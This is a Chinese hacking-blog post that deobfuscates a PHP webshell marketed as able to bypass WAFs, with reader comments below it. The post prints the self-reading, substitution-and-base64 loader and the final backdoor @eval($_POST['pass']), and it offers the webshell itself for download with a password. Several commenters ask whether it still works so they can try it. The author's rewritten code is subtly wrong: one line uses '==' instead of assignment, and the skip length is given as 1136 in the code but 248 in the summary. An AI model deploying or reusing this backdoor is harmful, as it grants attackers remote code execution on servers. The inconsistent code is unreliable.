一款过waf的一句话木马分析

  • 内容
  • 相关

中午,下班回来,就看一个朋友给我发了几个马儿  让我看看解解密码  很简单

1.png2.png


猛不猛我不知道   那时候手机  太长的看着就烦   就回到家瞅瞅了

首先我们看这个马儿


4.png

一步步来,先分析前面的。前面的PHP代码部分有一个eval,我们改成echo试试

5.png

输出得到


$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};$OO0OO000O($O000O0O00,1136);$OO00O00O0=($OOO0000O0($OO0OO00O0($OO0OO000O($O000O0O00,380),'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=','ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/')));eval($OO00O00O0);
替换进去得到


6.png

下来我们就要分析了


<?php
$OOO0O0O00=__FILE__;
//$OOO000000=urldecode('%74%68%36%73%62%65%68%71%6c%61%34%63%6f%5f%73%61%64%66%70%6e%72');

$OOO000000='th6sbehqla4co_sadfpnr';

$OO00O0000=248;

//$OOO0000O0=$OOO000000{4}.$OOO000000{9}.$OOO000000{3}.$OOO000000{5};
//$OOO0000O0.=$OOO000000{2}.$OOO000000{10}.$OOO000000{13}.$OOO000000{16};
//$OOO0000O0.=$OOO0000O0{3}.$OOO000000{11}.$OOO000000{12}.$OOO0000O0{7}.$OOO000000{5};
$OOO0000O0='base64_decode';

$O0O0000O0='OOO0000O0';

//$OO0OO0000=$OOO000000{17}.$OOO000000{12}.$OOO000000{18}.$OOO000000{5}.$OOO000000{19};
$OO0OO0000='fopen';

//if(!0)$O000O0O00=$OO0OO0000($OOO0O0O00,'rb');
$O000O0O00=fopen($OOO0O0O00,'rb');

//$OO0OO000O=$OOO000000{17}.$OOO000000{20}.$OOO000000{5}.$OOO000000{9}.$OOO000000{16};
$OO0OO000O=='fread';

//$OO0OO00O0=$OOO000000{14}.$OOO000000{0}.$OOO000000{20}.$OOO000000{0}.$OOO000000{20};
$OO0OO00O0='strtr';

//$OO0OO000O($O000O0O00,1136);
fread($O000O0O00,1136);

/*$OO00O00O0=($OOO0000O0(
    $OO0OO00O0(
	            $OO0OO000O($O000O0O00,380),
				'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
				'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
				)
			)
);*/

$OO00O00O0=(base64_decode(
	strtr(
		$OO0OO000O($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);


;eval($OO00O00O0);
return;
?>
分析后总结得到



$OOO0O0O00=__FILE__;//获取当前文件名
$O000O0O00=fopen($OOO0O0O00,'rb');//打开文件
fread($O000O0O00,248);//跳过248字节
$OO00O00O0=(base64_decode(
	strtr(
		fread($O000O0O00,380),
		'7q84PCgpNaRWIyHw9bZD6xrXYU0EonLetGSOmlFiK5QkuhM3jT/VfBvc+12AsdJz=',
		'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
		)
	)
);//读取380字节,根据代码表替换字符,base64解码
eval($OO00O00O0);//执行解码后的代码
10.png



解得


@eval($_POST['pass']);//密码就等于pass

怎么解得卖个关子  不会的可以看看

管理员设置 回复 可见隐藏内容




  文件名稱:一句话木马

  更新時間:

  下載声明:密码: gadu

立即下載

下载链接

网盘下载

密码: gadu

本文标签:

版权声明:若无特殊注明,本文皆为《颓废》原创,转载请保留文章出处。

收录状态:[百度已收录] | [360未收录] | [搜狗已收录]

本文链接:一款过waf的一句话木马分析 - https://www.0dayhack.com/post-836.html

严重声明:本站内容来自于互联网,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规,黑客不是骇客,黑客维护网络安全

发表评论

电子邮件地址不会被公开。 必填项已用*标注

评论

23条评论
  1. avatar

    xxxxxx Lv.1 Chrome 57.0.2987.98 Chrome 57.0.2987.98 Windows Windows 回复

    kan kan看看

    山东省 电信

    1. avatar

      A Lv.1 Firefox 62.0 Firefox 62.0 Windows Windows 回复

      还是要看看

      广东省佛山市 电信

      1. avatar

        sakula Lv.1 Chrome 64.0.3282.140 Chrome 64.0.3282.140 Windows Windows 回复

        学习

        浙江省杭州市 电信

        1. avatar

          wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

          厉害了,膜拜一下

          北京市 电信

          1. avatar

            wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

            学习一下,现在还能用吗,我去试一试....

            北京市 电信

            1. avatar

              wudi Lv.1 Sogou Explorer Sogou Explorer Windows Windows 回复

              学习一下,现在还能用吗,我去试一试

              北京市 电信

              1. avatar

                zz Lv.1 Chrome 67.0.3396.99 Chrome 67.0.3396.99 Windows Windows 回复

                学习学习

                加拿大

                1. avatar

                  haizi Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows Windows 回复

                  学习一下,现在还能用吗,我去试一试

                  广东省广州市 电信

                  1. avatar

                    lpflpf960 Lv.1 Chrome 55.0.2883.87 Chrome 55.0.2883.87 Windows 7 x64 Edition Windows 7 x64 Edition 回复

                    666666666666666666666666666666666

                    北京市 移动

                    1. avatar

                      wooluo0dayhack Lv.2 Chrome 67.0.3396.87 Chrome 67.0.3396.87 Mac OS X 10.13.2 Mac OS X 10.13.2 回复

                      6666666666666666厉害了

                      北京市 水利部